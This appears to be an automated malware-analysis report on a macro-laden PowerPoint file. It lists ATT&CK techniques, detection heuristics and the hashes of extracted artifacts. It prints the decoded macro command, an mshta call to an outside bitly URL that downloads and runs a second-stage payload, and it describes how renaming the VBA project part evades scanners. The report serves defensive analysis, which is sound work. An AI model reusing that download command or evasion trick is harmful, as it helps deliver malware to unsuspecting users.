MALICIOUS
100
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a renamed VBA project and an Auto_Open macro, indicating malicious intent. The VBA macro attempts to construct a URL by concatenating strings: "msh" + "ta " + "http://www.bitly.com/ashjdkqowdhqowdh". This URL is likely used to download and execute a second-stage payload.
Heuristics 3
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/Pdonsa.bin)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas283f221c45da2e9f7d3b8b358846b15795c287fcac6f37c51da34a687f129f7f |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6082 bytes |
vbaProject_00.bin0cd7c57324a56dfddb1d335749e98a67392479b674039ac55b23e7162630e048 |
vba-project | OOXML VBA project: ppt/Pdonsa.bin | 40448 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.